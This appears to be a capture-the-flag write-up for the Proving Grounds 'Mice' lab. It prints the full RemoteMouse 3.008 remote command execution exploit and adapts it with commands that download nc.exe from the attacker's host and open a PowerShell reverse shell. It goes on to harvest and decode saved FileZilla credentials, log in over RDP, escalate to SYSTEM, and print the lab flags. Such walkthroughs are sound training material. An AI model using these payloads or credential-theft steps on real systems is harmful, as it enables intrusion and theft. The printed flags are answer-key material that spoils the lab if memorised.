Mice
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.182.199
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 13:19 EST
Nmap scan report for 192.168.182.199
Host is up, received echo-reply ttl 125 (0.13s latency).
Scanned at 2025-11-10 13:19:45 EST for 242s
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
1978/tcp open remotemouse syn-ack ttl 125 Emote Remote Mouse
1979/tcp open unisql-java? syn-ack ttl 125
1980/tcp open pearldoc-xact? syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2025-11-10T18:23:48+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Issuer: commonName=Remote-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-25T10:09:25
| Not valid after: 2026-02-24T10:09:25
| MD5: ee3d:e4de:8e91:a5b4:7115:34cb:986a:f8bd
| SHA-1: 093c:db26:68db:b772:9089:ad5a:833b:90f8:d929:4eb7
| -----BEGIN CERTIFICATE-----
| MIIC1jCCAb6gAwIBAgIQdK7WCoPG665IL5mbwZdubTANBgkqhkiG9w0BAQsFADAU
<snipped>
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: REMOTE-PC
| NetBIOS_Domain_Name: REMOTE-PC
| NetBIOS_Computer_Name: REMOTE-PC
| DNS_Domain_Name: Remote-PC
| DNS_Computer_Name: Remote-PC
| Product_Version: 10.0.19041
|_ System_Time: 2025-11-10T18:23:19+00:00
7680/tcp open pando-pub? syn-ack ttl 125
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>We have 3 wierd open ports, and rdp on port 3389.
Lets try and connect to one of the first three open ports:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ nc -nv 192.168.182.199 1978
(UNKNOWN) [192.168.182.199] 1978 (?) open
SIN 15win nop nop 300I searched for that on google, and found this:
Also the same service name is shown in the nmap result.
We do not the exact version but we will pull this exploit and try it out:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ searchsploit remotemouse
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
RemoteMouse 3.008 - Arbitrary Remote Command Execution | windows/remote/46697.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ searchsploit -m 46697
Exploit: RemoteMouse 3.008 - Arbitrary Remote Command Execution
URL: https://www.exploit-db.com/exploits/46697
Path: /usr/share/exploitdb/exploits/windows/remote/46697.py
Codes: N/A
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Mice/46697.py┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ cat 46697.py
<snipped>
#!/usr/bin/python2
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from time import sleep
from sys import argv
def Ping(ip):
try:
target = socket(AF_INET, SOCK_STREAM)
target.settimeout(5)
target.connect((ip, 1978))
response=target.recv(1048)
target.close()
if response=="SIN 15win nop nop 300":
return True
else: return False
except:
print("ERROR: Request timed out")
def MoveMouse(x,y,ip):
def SendMouse(command,times,ip):
for x in range(times):
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(command,(ip,1978))
sleep(0.001)
if x>0:
command="mos 5m 1 0"
SendMouse(command,x,ip)
elif x<0:
x=x*-1
command="mos 5m -1 0"
SendMouse(command,x,ip)
if y>0:
command="mos 5m 0 1"
SendMouse(command,y,ip)
elif y<0:
y=y*-1
command="mos 6m 0 -1"
SendMouse(command,y,ip)
def MousePress(command,ip,action="click"):
if action=="down":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" d"),(ip,1978))
elif action=="up":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" u"),(ip,1978))
elif action=="click":
target = socket(AF_INET, SOCK_DGRAM)
target.sendto((command+" d"),(ip,1978))
target.sendto((command+" u"),(ip,1978))
else: raise Exception('MousePress: No action named "'+str(action)+'"')
def SendString(string,ip):
for char in string:
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(characters[char],(ip,1978))
sleep(0.5)
class mouse:
leftClick="mos 5R l"
rightClick="mos 5R r"
middleClick="mos 5R m"
characters={
"A":"key 8[ras]116", "B":"key 8[ras]119", "C":"key 8[ras]118", "D":"key 8[ras]113", "E":"key 8[ras]112",
"F":"key 8[ras]115", "G":"key 8[ras]114", "H":"key 8[ras]125", "I":"key 8[ras]124", "J":"key 8[ras]127",
"K":"key 8[ras]126", "L":"key 8[ras]121", "M":"key 8[ras]120", "N":"key 8[ras]123", "O":"key 8[ras]122",
"P":"key 8[ras]101", "Q":"key 8[ras]100", "R":"key 8[ras]103", "S":"key 8[ras]102", "T":"key 7[ras]97",
"U":"key 7[ras]96", "V":"key 7[ras]99", "W":"key 7[ras]98", "X":"key 8[ras]109", "Y":"key 8[ras]108",
"Z":"key 8[ras]111",
"a":"key 7[ras]84", "b":"key 7[ras]87", "c":"key 7[ras]86", "d":"key 7[ras]81", "e":"key 7[ras]80",
"f":"key 7[ras]83", "g":"key 7[ras]82", "h":"key 7[ras]93", "i":"key 7[ras]92", "j":"key 7[ras]95",
"k":"key 7[ras]94", "l":"key 7[ras]89", "m":"key 7[ras]88", "n":"key 7[ras]91", "o":"key 7[ras]90",
"p":"key 7[ras]69", "q":"key 7[ras]68", "r":"key 7[ras]71", "s":"key 7[ras]70", "t":"key 7[ras]65",
"u":"key 7[ras]64", "v":"key 7[ras]67", "w":"key 7[ras]66", "x":"key 7[ras]77", "y":"key 7[ras]76",
"z":"key 7[ras]79",
"1":"key 6[ras]4", "2":"key 6[ras]7", "3":"key 6[ras]6", "4":"key 6[ras]1", "5":"key 6[ras]0",
"6":"key 6[ras]3", "7":"key 6[ras]2", "8":"key 7[ras]13", "9":"key 7[ras]12", "0":"key 6[ras]5",
"\n":"key 3RTN", "\b":"key 3BAS", " ":"key 7[ras]21",
"+":"key 7[ras]30", "=":"key 6[ras]8", "/":"key 7[ras]26", "_":"key 8[ras]106", "<":"key 6[ras]9",
">":"key 7[ras]11", "[":"key 8[ras]110", "]":"key 8[ras]104", "!":"key 7[ras]20", "@":"key 8[ras]117",
"#":"key 7[ras]22", "$":"key 7[ras]17", "%":"key 7[ras]16", "^":"key 8[ras]107", "&":"key 7[ras]19",
"*":"key 7[ras]31", "(":"key 7[ras]29", ")":"key 7[ras]28", "-":"key 7[ras]24", "'":"key 7[ras]18",
'"':"key 7[ras]23", ":":"key 7[ras]15", ";":"key 7[ras]14", "?":"key 7[ras]10", "`":"key 7[ras]85",
"~":"key 7[ras]75", "\\":"key 8[ras]105", "|":"key 7[ras]73", "{":"key 7[ras]78", "}":"key 7[ras]72",
}
def PopCalc(ip):
MoveMouse(-5000,3000,ip)
MousePress(mouse.leftClick,ip)
sleep(1)
SendString("calc.exe",ip)
sleep(1)
SendString("\n",ip)
print("SUCCESS! Process calc.exe has run on target",ip)
def main():
try:
targetIP=argv[1]
except:
print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
exit()
if Ping(targetIP)==True:
PopCalc(targetIP)
else:
print("ERROR: Target machine is not running RemoteMouse")
exit()
if __name__=="__main__":
main()I will just edit the cmd to run on the target.
First test on what ports the target can reach to us:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ nc -nlvp 80
listening on [any] 80 ... SendString("curl http://192.168.45.187:80/test.txt",ip)┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ python2 46697.py 192.168.182.199
('SUCCESS! Process calc.exe has run on target', '192.168.182.199')┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.199] 60231
GET /test HTTP/1.1
Host: 192.168.45.187
User-Agent: curl/7.55.1
Accept: */*Exploitaion:
Lets upload netcat then get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... SendString("curl http://192.168.45.187:80/nc.exe -o C:\\Windows\\Tasks\\nc.exe",ip)Rerun the script again.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.182.199 - - [10/Nov/2025 14:23:51] "GET /nc.exe HTTP/1.1" 200 -Now lets get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ... SendString("C:\\Windows\\Tasks\\nc.exe 192.168.45.187 80 -e powershell",ip)┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ python2 46697.py 192.168.182.199
('SUCCESS! Process calc.exe has run on target', '192.168.182.199')┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.199] 58796
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\WINDOWS\system32> whoami
remote-pc\divinePost-Exploitation:
Doing some local enumeration, we will find filezilla ftp installed on that target:
PS C:\WINDOWS\system32> cd \
PS C:\> dir "Program Files"
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/21/2021 3:33 AM Common Files
d----- 12/6/2021 8:37 PM FileZilla FTP Client
d----- 10/19/2021 6:48 AM Internet Explorer
d----- 10/19/2021 6:30 AM Microsoft Update Health Tools
d----- 12/7/2019 1:14 AM ModifiableWindowsApps
d----- 6/21/2021 3:34 AM VMware
d----- 6/21/2021 3:33 AM Windows Defender
d----- 12/6/2021 8:21 PM Windows Defender Advanced Threat Protection
d----- 9/1/2021 8:40 AM Windows Mail
d----- 10/19/2021 6:48 AM Windows Media Player
d----- 12/7/2019 1:54 AM Windows Multimedia Platform
d----- 12/7/2019 1:50 AM Windows NT
d----- 6/18/2021 5:50 AM Windows Photo Viewer
d----- 12/7/2019 1:54 AM Windows Portable Devices
d----- 12/7/2019 1:31 AM Windows Security
d----- 12/7/2019 1:31 AM WindowsPowerShellFilezilla ftp has a file contains credentials for several purposes, I searched online for the path of that file:
We can find under our current user\appdata\roamin\filezilla:
PS C:\> cd \Users\divine\AppData\Roaming
PS C:\Users\divine\AppData\Roaming> dir
Directory: C:\Users\divine\AppData\Roaming
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/6/2021 8:39 PM Adobe
d----- 12/6/2021 8:40 PM FileZilla
d---s- 11/10/2025 11:01 AM Microsoft
PS C:\Users\divine\AppData\Roaming> cd FileZilla
PS C:\Users\divine\AppData\Roaming\FileZilla> dir
Directory: C:\Users\divine\AppData\Roaming\FileZilla
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/6/2021 8:40 PM 18963 filezilla.xml
-a---- 12/6/2021 8:40 PM 451 layout.xml
-a---- 12/6/2021 8:40 PM 28672 queue.sqlite3
-a---- 12/6/2021 8:40 PM 458 recentservers.xmlIn recentservers:
PS C:\Users\divine\AppData\Roaming\FileZilla> type recentservers.xml
type recentservers.xml
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.54.1" platform="windows">
<RecentServers>
<Server>
<Host>ftp.pg</Host>
<Port>21</Port>
<Protocol>0</Protocol>
<Type>0</Type>
<User>divine</User>
<Pass encoding="base64">Q29udHJvbEZyZWFrMTE=</Pass>
<Logontype>1</Logontype>
<PasvMode>MODE_DEFAULT</PasvMode>
<EncodingType>Auto</EncodingType>
<BypassProxy>0</BypassProxy>
</Server>
</RecentServers>
</FileZilla3>I will copy the base64 encoded password, decode it, validate if it it still valid, then authenticate via xfreerdp3 if yes:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ echo 'Q29udHJvbEZyZWFrMTE=' | base64 -d
ControlFreak11
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ nxc rdp 192.168.182.199 -u divine -p ControlFreak11
RDP 192.168.182.199 3389 REMOTE-PC [*] Windows 10 or Windows Server 2016 Build 19041 (name:REMOTE-PC) (domain:Remote-PC) (nla:False)
RDP 192.168.182.199 3389 REMOTE-PC [+] Remote-PC\divine:ControlFreak11 (Pwn3d!)It is valid.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ xfreerdp3 /v:192.168.182.199 /u:divine /p:ControlFreak11 /dynamic-resolution /clipboard
<snipped>
Again based on our previous search, I found that we can exploit remote mouse for privilege escalation:
We will follow these steps.
First if you can not view the icons under the system tray, just open task manager, and restart windows explorer.
First we will right-click on remote mouse, the preferences:
Go to settings:
Click on change above.
Now in the windows address bar paste cmd.exe:
Here we elevated our privileges to system.
Get the flags:
C:\Users\divine\>type Desktop\local.txt
5948fd6324cdc146cc850881952f1d4d
C:\Users\divine>type \Users\Administrator\Desktop\proof.txt
fb33cfb7a57330065acc2649125f7b39Last updated